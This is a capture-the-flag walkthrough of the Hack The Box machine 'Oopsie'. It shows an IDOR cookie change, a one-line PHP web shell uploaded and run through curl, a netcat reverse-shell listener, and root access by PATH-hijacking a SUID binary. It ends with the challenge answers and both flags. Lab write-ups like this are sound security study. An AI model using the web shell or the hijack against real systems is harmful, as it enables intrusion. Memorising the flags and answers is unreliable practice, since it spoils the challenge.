PyUs3r

PyUs3r

Pentester, CTF player

Oopsie - Hack The Box

Introduction

In this machine, we are exploiting an IDOR with RCE. With respect to privilege escalation, we are taking advantage of leaked credential files and exploiting SUID files through PATH Hijacking.

Reconnaissance

  • Connectivity
ping -c1 10.129.72.77
  • Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.129.72.77

  • Fuzzing with gobuster
gobuster dir -u megacorp.com -w /usr/share/wordlists/dirb/common.txt -t 100

  • Intercept trafic with burpsuite

  • Access to login pannel

Exploitation

  • Exploit IDOR

Change id to 1

  • Change cookie session in upload directory

  • Upload php malicious file
echo "<?php system(\$_GET['cmd']); ?>" > cmd.php

  • Execute command
curl http://megacorp.com/uploads/cmd.php?cmd=whoami

  • Send reverse shell

nc -nlvp 9000

Post-exploitation

  • TTY

https://invertebr4do.github.io/tratamiento-de-tty/

  • Find user flag

  • Find credentials file

  • Change to robert user

  • Find SUID files
id


find / -perm -4000 -group bugtracker -ls 2>/dev/null

  • Review /usr/bin/bugtracker
strings /usr/bin/bugtracker

  • Exploit PATH Hijacking
export PATH=/tmp/:$PATH
echo "bash -p" > cat
chmod +x cat
/usr/bin/bugtracker


cat /root/root.txt

Tasks

  1. With what kind of tool can intercept web traffic?

    proxy

  2. What is the path to the directory on the webserver that returns a login page?

    /cdn-cgi/login

  3. What can be modified in Firefox to get access to the upload page?

    cookie

  4. What is the access ID of the admin user?

    34322

  5. On uploading a file, what directory does that file appear in on the server?

    /uploads

  6. What is the file that contains the password that is shared with the robert user?

    db.php

  7. What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group?

    find

  8. Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run?

    root

  9. What SUID stands for?

    Set Owner User ID

  10. What is the name of the executable being called in an insecure manner?

    cat

  11. Submit user flag

    f2c74ee8db7983851ab2a96a44eb7981

  12. Submit root flag

    af13b0bee69f8a877c3faf667f7beacf